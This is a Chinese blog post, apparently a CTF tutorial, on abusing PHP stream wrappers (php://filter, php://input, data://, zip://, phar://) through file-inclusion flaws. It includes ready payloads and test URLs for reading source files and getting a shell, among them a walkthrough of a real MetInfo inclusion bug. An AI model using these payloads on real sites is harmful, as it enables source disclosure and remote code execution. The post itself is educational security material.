localhost 88 1.php,ctf中常见的php伪协议应用

最新推荐文章于 2022-08-12 10:25:49 发布
最新推荐文章于 2022-08-12 10:25:49 发布
阅读量328 收藏
点赞数
文章标签: localhost 88 1.php

ctf中常见的php伪协议应用

0x01 知识储备

三个白帽

payload:php://filter/write=convert.base64-decode/resource=shell.php

bypass:死亡die,base64在解码时会忽略特殊字符

pctf2016

payload:data:text/plain;base64,MS50eHQ=

bypass:stripos等if判断

hctf2016+swpu2016

payload1+payload2

payload1:php://filter/convert.base64-encode/resource=../flag.php

payload2:phar://xxx.jpg/shell

西安华山杯2016

payload:php://input

payload:data:text/plain;base64,xxxx

0x02 相关研究

1)、php:// 这里分析常用到的php://input和php://filter.其中php://input要求"allow_url_include"设置为"On" 写个测试文件test.php

include($_GET['file']);

?>

本地测试发现一个有趣的现象(本地1.php文件内容为phpinfo())

1、访问http://localhost:88/test.php?file=php://input

POST:php://filter/read=convert.base64-encode/resource=1.php

回显结果:php://filter/read=convert.base64-encode/resource=1.php

POST:<?php phpinfo();?>

回显结果:phpinfo()执行的结果

2、访问http://localhost:88/test.php?file=php://filter/read=convert.base64-encode/resource=1.php

回显结果:PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=

3、访问http://localhost:88/test.php?file=php://filter//resource=1.php

回显结果:phpinfo()执行的结果

4、访问http://localhost:88/test.php?file=PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=(可以是其他任意字符,这里我只是想和第二种情况好比较)

回显结果:Warning: include(PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=): failed to open stream: No such file or directory in C:\phpStudy\WWW\test.php on line 2

综上所述,就是“流”+“字符变量”,include不解析直接输出字符变量,“流”+“php代码”,include会解析执行,没有“流”则失败

2)、data:// 这里分析常用到的data:text/plain,xxxxxxx、data:text/plain;base64,xxxxxxx

访问http://localhost:88/test.php?file=data:text/plain,<?php phpinfo();?>

执行phpinfo

访问http://localhost:88/test.php?file=data:text/plain,aaaaa

输出aaaaa

访问http://localhost:88/test.php?file=data:text/plain;base64,PD9waHAgIA0KcGhwaW5mbygpOw0KPz4=

执行phpinfo

访问http://localhost:88/test.php?file=data:text/plain;base64,aaaaaa

输出aaaaaa base64解码后的内容

如果用file_get_contents函数做测试的话,大多都和include函数相同,不同的就是php代码不能解析,直接输出

3)、zlib:// 有一种用法是:zip://archive.zip#dir/file.txt 找到一个真实漏洞:metinfo,版本大概是5.3.9 参见cheery师傅的博客,metinfo 最新代码执行一枚(8月30日) 漏洞成因:require_once $depth.'../include/captcha.class.php';变量$depth可控 利用方式为:构造文件目录结构为"../include/captcha.class.php",内含shell的文件,(在linux下才可构造,win下文件名不能含特殊字符),然后压缩为zip包,再把zip后缀改为png并上传 本地为了测试方便,修改为require_once $_GET['file'].'captcha.class.php';

访问`http://localhost:88/test.php?file=zip://C:/phpStudy/WWW/test.jpg%23`即可getshell

4)、phar:// 这种和zip伪协议差不多,用法有一点点区别一个是“#”,一个是“/” phar://archive.zip/dir/file.txt

同理访问http://localhost:88/test.php?file=phar://C:/phpStudy/WWW/test.jpg/即可getshell

0x03 应用场景

0x04再推荐几篇:

weixin_39872257
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-WEB-01-localhost access only!!
weixin_30402085的博客
07-30 2961
题目地址:http://http://web.jarvisoj.com:32774/ 0x01 题目分析   localhost access only字面意思只允许本机登录   考虑添加header:             X-Forward-For 127.0.0.1     ...
【BugkuCTF】Web--never give up
VZZmieshenquan的博客
02-11 3383
Description: http://123.206.87.240:8006/test/hello.php 作者:御结冰城 Solution: 打开页面,查看源代码发现有个1p.html,将网址改成123.206.87.240:8006/test/1p.html发现跳转到了www.bugku.com,猜测应该是有重定向的代码,那直接看源代码就行,输入view-source:123.206...
php一些特性函数(ctfshow)
qq_62046696的博客
06-22 1969
preg_match()返回 pattern 的匹配次数。 它的值将是0次(不匹配)或1次,因为preg_match()在第一次匹配后 将会停止搜索。preg_match_all()不同于此,它会一直搜索subject 直到到达结尾。 如果发生错误preg_match()返回 FALSE。情况1:get方式传入num参数,然后通过preg_match判断是否存在数字,如果存在,就die,不存在的话然后intval函数判断整数,通过数组绕过preg_match,因为preg_match无法处理数组情况2:if
vs 运行 asp.net mvc 项目/程序 启动慢、运行慢、进去等待长、调试慢,我的解决方案
MyNameIsXiaoLai的博客
04-30 1339
希望对你们有帮助!
2016xctf一道ctf题目
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF 离线C PHP python 汇编函数查询 chm电子书合集
10-06
1. **CTF基础与竞赛理解**: CTF是一种网络安全竞赛,参赛者通过解决各种安全挑战,如密码学、逆向工程、网络攻防等,来获取“旗帜”或关键信息。这个合集的资料能帮助你了解CTF的基本概念、竞赛规则以及赛制,对...
CTF-Web-Challenge:使用PHP在Web进行CTF挑战
03-25
2. **变量和作用域**:理解PHP的变量如何工作,以及全局、局部、静态和超全局变量的作用域,有助于识别可能导致安全问题的代码片段。 3. **文件操作**:PHP允许与文件系统交互,包括读取、写入和删除文件。了解...
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
CTF比赛常见题型-适合初学者
最新发布
08-17
CTF比赛常见题型--适合初学者
CTF常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
ctf题库--该题不简单
miko2018的博客
08-21 4362
&amp;amp;lt;题目&amp;amp;gt; 无语了,想给你们制造点悬念都没有了,哎!直接去做题吧。 解题链接: http://ctf5.shiyanbar.com/crack/3/ &amp;amp;lt;解答&amp;amp;gt; 该题目虽然被列为难题,但是如果选对正确的工具和应用正确的方式去操作还是很容易解答的。 ※拿到题目后,打开程序,按照要求输入hello,注册码随意,点击按钮出现错误信息,记录下错误信息内容。 ※使用PE...
CTF考核writeup(2)
一段旅途
11-23 2224
没有什么,保存下来。主要有xss csrf 绕过 上传的内容。
关于进不去localhost:8888的问题
WARGON的博客
06-24 3万+
localhost的端口号默认为8080,当使用eclipse时会默认使用eclipse的server.xml文件覆盖tomcat的server.xml。导致之前设置的8888端口失效。可以修改eclipse的server.xml文件,防止覆盖。还有。不要乱动webapps文件夹下的ROOT文件夹,搞不好就会找不到服务器。很受伤。...
谷粒商城-商品服务的开发(查询)
java全包开发,java辅导
11-09 306
1.先在gulimail_mail数据库的pms_category表执行sql导入模拟数据. 2.在gulimail-product模块进行后端开发查询处所有商品分类并以树形结构展示出来。 (1)在CategoryController: /** * 查出所有分类以及子分类,以树形结构组装起来 */ @RequestMapping("/list、tree") public R list(){ List<CategoryEntity>
localhost:8080打不开原因解决方法
热门推荐
萧逸闲侃
09-29 14万+
一,tomcat 未启动,所以http://localhost:8080打不开; 二,tomcat图标显示已启动,但http://localhost:8080还是打不开,可能是环境变量没有配置好,关于怎么配置环境变量网上到处都是,一下仅供参考: JAVA_HOME   D:\
CTF新手,请问从本地访问flag!
algae
08-04 8万+
本地访问加header 127.0.0.1 http://123.206.87.240:8002/localhost/ burpsuite(强大,但麻烦,有点慢) 抓包加上下面一句话 X-Forwarded-For: 127.0.0.1 (或者client-ip: 127.0.0.1,不同题不一样) ip(简单快捷) 3. header(个性化定制头) 4.hackbar(最快) http://123.206.31.85:1003/ ...
如何用手机访问电脑本地的localhost
你,若盛开的专栏
08-12 6589
手机访问电脑本地的localhost
ctf常用的PHP伪协议
02-15
CTF比赛,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: 1. data: 协议 这种形式的PHP伪协议通常用于在HTML嵌入PHP代码,例如: ``` ;base64,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值